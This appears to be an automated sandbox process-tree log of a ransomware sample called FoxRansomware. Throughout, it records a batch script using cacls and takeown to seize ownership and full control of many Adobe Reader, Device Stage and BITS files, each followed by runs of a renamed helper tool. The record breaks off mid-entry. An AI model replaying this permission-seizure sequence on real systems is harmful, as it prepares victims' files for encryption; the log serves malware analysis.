C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:2124
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:1452
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵PID:2984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "tasks.xml" -nobanner3⤵PID:2956
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "tasks.xml" -nobanner4⤵PID:2252
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""2⤵PID:3124
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C3⤵PID:2412
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"3⤵PID:1528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "cryptocme2.sig" -nobanner3⤵PID:2520
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "cryptocme2.sig" -nobanner4⤵PID:2576
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""2⤵PID:3356
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C3⤵PID:2572
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"3⤵PID:3144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "pmd.cer" -nobanner3⤵PID:3380
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "pmd.cer" -nobanner4⤵PID:3168
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""2⤵PID:3412
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C3⤵PID:3452
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"3⤵
- Modifies file permissions
PID:3492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "email_initiator.gif" -nobanner3⤵PID:3080
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "email_initiator.gif" -nobanner4⤵PID:3400
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3196
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""2⤵PID:2508
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C3⤵PID:1520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"3⤵PID:3528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "pdf.gif" -nobanner3⤵PID:3272
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "pdf.gif" -nobanner4⤵PID:3188
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""2⤵PID:3104
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C3⤵PID:3312
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"3⤵PID:3300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "server_issue.gif" -nobanner3⤵PID:3228
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "server_issue.gif" -nobanner4⤵PID:3292
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""2⤵PID:3560
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:3520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"3⤵
- Modifies file permissions
PID:3832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner3⤵PID:3848
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner4⤵PID:3880
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""2⤵PID:3884
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C3⤵PID:3836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"3⤵PID:3424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CourierStd.otf" -nobanner3⤵PID:3876
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CourierStd.otf" -nobanner4⤵PID:3672
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3812
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""2⤵PID:4124
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C3⤵PID:3748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"3⤵PID:4120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "zx______.pfm" -nobanner3⤵PID:4112
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "zx______.pfm" -nobanner4⤵PID:3924
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""2⤵PID:3544
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C3⤵PID:3572
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"3⤵PID:3640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner3⤵PID:3764
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner4⤵PID:3712
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4160
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""2⤵PID:3984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C3⤵PID:3816
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"3⤵PID:3760
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "can32.clx" -nobanner3⤵PID:3692
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "can32.clx" -nobanner4⤵PID:4320
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""2⤵PID:4000
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C3⤵PID:1056
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"3⤵PID:3720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "symbol.txt" -nobanner3⤵PID:4332
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "symbol.txt" -nobanner4⤵PID:2408
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4200
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""2⤵PID:3624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C3⤵PID:4292
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"3⤵PID:4240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "SYMBOL.TXT" -nobanner3⤵PID:3952
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "SYMBOL.TXT" -nobanner4⤵PID:4172
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:2556
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:4204
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵PID:4184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "behavior.xml" -nobanner3⤵PID:4036
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "behavior.xml" -nobanner4⤵PID:4480
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4640
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:4488
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:4032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵
- Modifies file permissions
PID:4372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵PID:4648
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵PID:4680
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4656
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat""2⤵PID:1228
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:4416
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat"3⤵
- Modifies file permissions
PID:4436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "qmgr1.dat" -nobanner3⤵PID:4588
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "qmgr1.dat" -nobanner4⤵PID:4608
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6412
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""2⤵PID:4496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C3⤵PID:4708
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"3⤵
- Modifies file permissions
PID:4424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "ChessMCE.png" -nobanner3⤵PID:4720
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "ChessMCE.png" -nobanner4⤵PID:4700
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵PID:4792
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:4840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵
- Modifies file permissions
PID:4548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵PID:4732
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵PID:4860
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4868
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵PID:4760
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:4988
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵PID:4984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵PID:4876
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵PID:4852
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""2⤵PID:5012
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C3⤵PID:4800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"3⤵
- Modifies file permissions
PID:4908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "license.html" -nobanner3⤵PID:4940
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "license.html" -nobanner4⤵PID:5044
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5116
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""2⤵PID:5108
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C3⤵PID:5052
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"3⤵PID:4936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "add_reviewer.gif" -nobanner3⤵PID:5028
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "add_reviewer.gif" -nobanner4⤵PID:5140
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""2⤵PID:5172
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C3⤵PID:5036
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"3⤵PID:4260
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "forms_received.gif" -nobanner3⤵PID:5292
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "forms_received.gif" -nobanner4⤵PID:5304
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""2⤵PID:5880
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C3⤵PID:5316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"3⤵PID:6676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "reviews_super.gif" -nobanner3⤵PID:5384
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "reviews_super.gif" -nobanner4⤵PID:5456
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5444
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""2⤵PID:6660
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C3⤵PID:1896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"3⤵
- Modifies file permissions
PID:5588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "submission_history.gif" -nobanner3⤵PID:2108
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "submission_history.gif" -nobanner4⤵PID:6188
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""2⤵PID:5220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵PID:5648
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"3⤵PID:5428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "Identity-H" -nobanner3⤵PID:5672
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "Identity-H" -nobanner4⤵PID:5704
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5716
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""2⤵PID:6920
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C3⤵PID:5656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"3⤵PID:5580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "MinionPro-Regular.otf" -nobanner3⤵PID:6896
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "MinionPro-Regular.otf" -nobanner4⤵PID:868
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""2⤵PID:6280
-
